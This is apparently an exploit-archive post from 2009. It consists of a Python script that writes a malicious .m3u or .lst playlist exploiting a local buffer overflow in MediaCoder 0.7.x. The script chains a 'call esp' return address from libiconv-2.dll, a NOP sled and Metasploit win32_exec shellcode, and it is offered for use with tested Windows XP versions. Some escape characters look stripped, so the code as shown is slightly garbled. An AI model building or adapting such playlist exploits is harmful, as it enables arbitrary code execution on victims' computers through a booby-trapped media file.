Home / os / win10

mediacoder07x-overflow.txt

Posted on 28 August 2009

================================================================================= MediaCoder 0.7.x (.m3u & .lst) universal local buffer overlow exploit all devices ================================================================================= 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 0 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1 #[+] Discovered By : Inj3ct0r #[+] Site : Inj3ct0r.com #[+] Support e-mail : submit[at]inj3ct0r.com #[+] Visit : inj3ct0r.com , inj3ct0r.org , inj3ct0r.net #usage: exploit.py print "************************************************************************** " print "download all device's players : http://www.mediacoderhq.com/device/" print " MediaCoder 0.7.x (.m3u & .lst) universal local buffer overlow exploit all devices " print "PSP edition ,MP3/MP4 player ,iPhone/iPod edition and 3GP edition all old version all vul like 0.6.x etc... " print " exploiter: opt!x <optix@9.cn>" print " Tested on: Windows XP Pro SP2 Fr " print "tested under windows XP SP3 (RU) and (FR) and windows xp SP2 (FR) AND (EN) thank you vmware :=" print "************************************************************************** " buff = "x41" * 256 ret = "x5Fx71x02x66" # 0x6602715F from libiconv-2.dll call esp nop = "x90" * 10 # win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com shellcode = ( "x29xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13xc9" "x2cxc9x40x83xebxfcxe2xf4x35xc4x8dx40xc9x2cx42x05" "xf5xa7xb5x45xb1x2dx26xcbx86x34x42x1fxe9x2dx22x09" "x42x18x42x41x27x1dx09xd9x65xa8x09x34xcexedx03x4d" "xc8xeex22xb4xf2x78xedx44xbcxc9x42x1fxedx2dx22x26" "x42x20x82xcbx96x30xc8xabx42x30x42x41x22xa5x95x64" "xcdxefxf8x80xadxa7x89x70x4cxecxb1x4cx42x6cxc5xcb" "xb9x30x64xcbxa1x24x22x49x42xacx79x40xc9x2cx42x28" "xf5x73xf8xb6xa9x7ax40xb8x4axecxb2x10xa1xdcx43x44" "x96x44x51xbex43x22x9exbfx2ex4fxa8x2cxaax02xacx38" "xacx2cxc9x40" ) exploit = buff + ret + nop + shellcode try: out_file = open("media.m3u",'w')#or media.lst out_file.write(exploit) out_file.close() raw_input(" Exploit file created! ") except: print "Error" --------------------------------- ThE End =] Visit my proj3ct : http://inj3ct0r.com http://inj3ct0r.org http://inj3ct0r.net # ~ - [ [ : Inj3ct0r : ] ]

 

TOP